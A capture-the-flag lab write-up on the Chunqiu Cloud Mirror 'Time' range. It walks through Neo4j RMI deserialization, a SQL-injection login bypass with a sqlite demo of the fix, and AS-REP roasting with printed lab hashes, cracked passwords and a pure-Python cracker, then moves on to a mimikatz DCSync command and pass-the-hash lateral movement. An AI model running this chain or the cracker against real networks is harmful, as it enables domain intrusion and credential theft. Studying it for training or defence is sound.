春秋云镜 (Chunqiu Cloud Mirror) - Time - Writeup


fscan scan:

39.99.224.36:22 open
39.99.224.36:1337 open
39.99.224.36:7473 open
39.99.224.36:7474 open
39.99.224.36:7687 open
39.99.224.36:42265 open

7687 is Neo4j's Bolt port (7474/7473 are its HTTP/HTTPS ports), and 1337 is the legacy neo4j-shell RMI service.

Exploit CVE-2021-34371: Neo4j through 3.4.18 with the shell server enabled deserializes arbitrary Java objects over that RMI service on port 1337, which gives remote code execution.

(screenshot)

The first flag is under /home.

(screenshot)

There is also a hint: "Do you know the authentication process of Kerberos?", which points at Kerberos authentication attacks inside the domain.

Scan the intranet with fscan and tidy up the results:

172.22.6.12   DC-PROGAME.xiaorang.lab (the domain controller)
172.22.6.25   XIAORANG\WIN2019
172.22.6.36   (already compromised: the Neo4j host)
172.22.6.38   ordinary machine; port 80 has the page title "后台登陆" (backend login)

Logging in with admin / 1'or'1 succeeds, so the login form is SQL-injectable.

Run sqlmap against it.

(screenshot)
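Why admin / 1'or'1 gets through, as an added example that is not code from the original writeup or from the lab's OA application (whose backend is not shown on the page). The oa_admin table name and the administrator credential are from the writeup; the username/password column layout and the query shape are assumptions, built in an in-memory sqlite3 database so it runs offline:

```python
import sqlite3

# Constructed stand-in for the OA login query. The lab's backend code is not on the page,
# so this oa_admin layout (username/password columns) is an assumption, seeded with the
# credential the writeup later dumps from that table.
SCHEMA = "CREATE TABLE oa_admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
SEED = ("administrator", "bo2y8kAL3HnXUiQo")


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute(SCHEMA)
    con.execute("INSERT INTO oa_admin (username, password) VALUES (?, ?)", SEED)
    return con


def vulnerable_query(username: str, password: str) -> str:
    # String formatting: the attacker's quote closes the literal and the rest becomes SQL,
    # so 1'or'1 turns the WHERE into (username='admin' AND password='1') OR '1'.
    return f"SELECT id FROM oa_admin WHERE username='{username}' AND password='{password}'"


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    return con.execute(vulnerable_query(username, password)).fetchone() is not None


def login_fixed(con: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameters: the driver passes the values separately from the statement,
    # so a quote in the input stays data and never changes the query structure.
    sql = "SELECT id FROM oa_admin WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query("admin", "1'or'1"))
    print("vulnerable login:", login_vulnerable(db, "admin", "1'or'1"))
    print("fixed login:     ", login_fixed(db, "admin", "1'or'1"))
```

Note that the table only contains administrator, not admin: the injected OR '1' makes the supplied username irrelevant and returns the first row, which is why the bypass works with any name. With bound parameters the same input simply fails to match.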

The second flag is in the oa_f1Agggg table.

oa_admin holds administrator:bo2y8kAL3HnXUiQo

oa_users holds 500 users; their usernames become the candidate list for the domain.

Try AS-REP Roasting against that user list: accounts with Kerberos pre-authentication disabled hand back an AS-REP whose encrypted part can be cracked offline.

Two accounts come back:

$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:facdaf9d4873ce4157cf4a0b21f5ae84$3df161d4b10148733fe2477420ed69982e30b9462f5f2f0a480759dfc236f63ef0fb8b64e0041e5a89da482bd351cae2e5ebd8e63e0f5311614cba5cde614872b369b02b0456c3863870297327df58a2fe84a4aa318038bebec7161ef52dd37b334e118dfc7adb3ac792c09fadc5d2f7a9cfa74dfc386a8e179db2808412dd7f242fdc3fe61c3bf2129000f6ac357708acd6ad6881d29a86e02e9f4852830672345d3c2cd2fea5b1607eae4822eaddd1c713dd88ba2c5701616b2b7f7fd91e8e947b02d00c6c905d4f2d32827883abbdb6696e060eed2b32d6d73948e9888e82ed3735164bc63818a92b878b

$krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:367124bb06e2a61242eab446212ef88c$67bc55bb143786fc63d2de91002775025c69372a966cd2f2bc10093c295f18b02580a31a381f5b8b4732f1146aa2338481fe38f3fabfbe516a1035b8da0f1028933f6e3d3b1cc55f5802ce5b124b818dbbb739328fe2469375c2b5bb4da18168bca52a25ca080a69ed37fbce128747fb3d0eb09abe4928de5c9e85bff18048514bd334b136409ecf495d5d0b857dbea2d70bac981dc0b7e610c6e2230f2365fc082ac446cbf923d25596b27c70126465699476dd099aaf88c6b89378abce73aaef7217ee8d954e5c066a65d4c5c02694ff3887ba3ae5cedbcf77bde2fa0f590eb642cadda08ff9a0cc430097

Run them straight through hashcat (mode 18200, Kerberos 5 AS-REP etype 23).

(screenshot)

zhangxin@xiaorang.lab  strawberry
wenshao@xiaorang.lab   hellokitty
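To make the $krb5asrep$23$ lines and the hashcat step concrete, here is an added example (not code from the original writeup or from hashcat) that re-implements the check hashcat mode 18200 performs: derive the RC4-HMAC key (the NT hash, MD4 over UTF-16LE) from each candidate password, decrypt the AS-REP enc-part per RFC 4757 with key usage 8, and compare the HMAC-MD5 checksum. The hash it cracks is constructed inside the block from a hypothetical user (testuser) and a known password; the lab's real hashes are not embedded, and MD4 is written out in full because hashlib's md4 is frequently unavailable under OpenSSL 3:

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass
from typing import Iterable, Optional

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python; hashlib's md4 is often disabled under OpenSSL 3."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK

    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (function, additive constant, shift per register, message-word order)
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [4 * (i % 4) + i // 4 for i in range(16)]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for fn, k, shifts, order in rounds:
            for i in range(16):
                j = (-i) % 4  # register updated at this step cycles a, d, c, b
                t = v[j] + fn(v[(j + 1) % 4], v[(j + 2) % 4], v[(j + 3) % 4]) + x[order[i]] + k
                v[j] = rotl(t & MASK, shifts[i % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC (etype 23) Kerberos key is just the NT hash: MD4 over UTF-16LE."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


@dataclass
class AsRepHash:
    user: str
    realm: str
    checksum: bytes  # 16-byte HMAC-MD5 over confounder || EncASRepPart
    edata: bytes     # RC4 ciphertext of that same plaintext


def parse_asrep_hash(line: str) -> AsRepHash:
    """Parse $krb5asrep$23$user@realm:checksum$edata (GetNPUsers.py output, hashcat mode 18200)."""
    prefix = "$krb5asrep$23$"
    if not line.startswith(prefix):
        raise ValueError("only etype 23 (RC4-HMAC) hashes are handled here")
    ident, _, rest = line[len(prefix):].partition(":")
    cksum_hex, _, edata_hex = rest.partition("$")
    user, _, realm = ident.rpartition("@")
    return AsRepHash(user, realm, bytes.fromhex(cksum_hex), bytes.fromhex(edata_hex))


def check_password(h: AsRepHash, password: str) -> bool:
    """RFC 4757 decrypt with key usage 8: Ki = HMAC-MD5(NT, usage), Ke = HMAC-MD5(Ki, checksum)."""
    ki = hmac.new(nt_hash(password), struct.pack("<I", 8), hashlib.md5).digest()
    ke = hmac.new(ki, h.checksum, hashlib.md5).digest()
    plaintext = rc4(ke, h.edata)
    return hmac.compare_digest(hmac.new(ki, plaintext, hashlib.md5).digest(), h.checksum)


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    h = parse_asrep_hash(line)
    return next((w for w in wordlist if check_password(h, w)), None)


def make_asrep_hash(user: str, realm: str, password: str, enc_part: bytes, confounder: bytes) -> str:
    """Encrypt the way a KDC does (checksum first, Ke derived from it) to build a test hash line."""
    plaintext = confounder + enc_part
    ki = hmac.new(nt_hash(password), struct.pack("<I", 8), hashlib.md5).digest()
    cksum = hmac.new(ki, plaintext, hashlib.md5).digest()
    ke = hmac.new(ki, cksum, hashlib.md5).digest()
    return f"$krb5asrep$23${user}@{realm}:{cksum.hex()}${rc4(ke, plaintext).hex()}"


# Constructed sample (not the lab's hash): hypothetical pre-auth-disabled user, fake EncASRepPart body.
SAMPLE_HASH = make_asrep_hash("testuser@xiaorang.lab", "XIAORANG.LAB", "strawberry",
                              b"\x79\x82\x01\x0c" + bytes(range(60)), b"\x11" * 8)
WORDLIST = ["123456", "hellokitty", "strawberry", "Password1"]

if __name__ == "__main__":
    print(crack(SAMPLE_HASH, WORDLIST))
```

parse_asrep_hash() also accepts the two lines above; the user field comes out as zhangxin@xiaorang.lab because GetNPUsers.py writes user@domain before the realm. The pure-Python loop is only for understanding the format: for 500 users and a real wordlist, hashcat is the tool.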

RDP into 172.22.6.25 with the cracked domain credentials.

(screenshot)

Upload winPEAS.bat.

It picks up yuxuan's plaintext password:

(screenshot)

yuxuan  Yuxuan7QbrgZ3L

And yuxuan's sIDHistory attribute carries the domain admin's SID, so yuxuan effectively has domain-admin privileges.

Log in as yuxuan and run DCSync with mimikatz:

lsadump::dcsync /domain:xiaorang.lab /user:Administrator

(screenshot)

Then psexec laterally to the other two machines with the Administrator hash from DCSync and collect the remaining two flags.